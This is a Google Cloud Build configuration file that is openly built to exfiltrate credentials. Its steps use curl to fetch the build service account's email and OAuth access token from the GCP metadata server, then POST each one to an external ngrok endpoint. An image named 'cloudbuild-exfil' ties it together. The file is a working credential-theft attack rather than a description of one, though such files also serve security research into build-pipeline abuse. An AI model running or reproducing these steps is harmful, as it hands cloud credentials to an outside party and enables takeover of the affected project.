steps:
- name: 'launcher.gcr.io/google/ubuntu1604'
  entrypoint: 'curl'
  args: ['http://68b32e628555.ngrok.io']

# GET service account email address from metadata api
- name: 'launcher.gcr.io/google/ubuntu1604'
  entrypoint: 'curl'
  args: ['-o', 'email.out', "--header", "Metadata-Flavor: Google", "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email"]

# POST to email of service account to the configured ngork endpoint
- name: 'launcher.gcr.io/google/ubuntu1604'
  entrypoint: 'curl'
  args: ['--header', 'Content-type: application/json"', '--data', '@email.out', 'http://68b32e628555.ngrok.io']
  
# GET service accoutn token from metadata api
- name: 'launcher.gcr.io/google/ubuntu1604'
  entrypoint: 'curl'
  args: ['-o', 'token.out', "--header", "Metadata-Flavor: Google", "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"]

  # POST to token of service account to the configured ngork endpoint
- name: 'launcher.gcr.io/google/ubuntu1604'
  entrypoint: 'curl'
  args: ['--header', 'Content-type: application/json"', '--data', '@token.out', 'http://68b32e628555.ngrok.io']

images: ['gcr.io/cloudbuild-exfil/curl']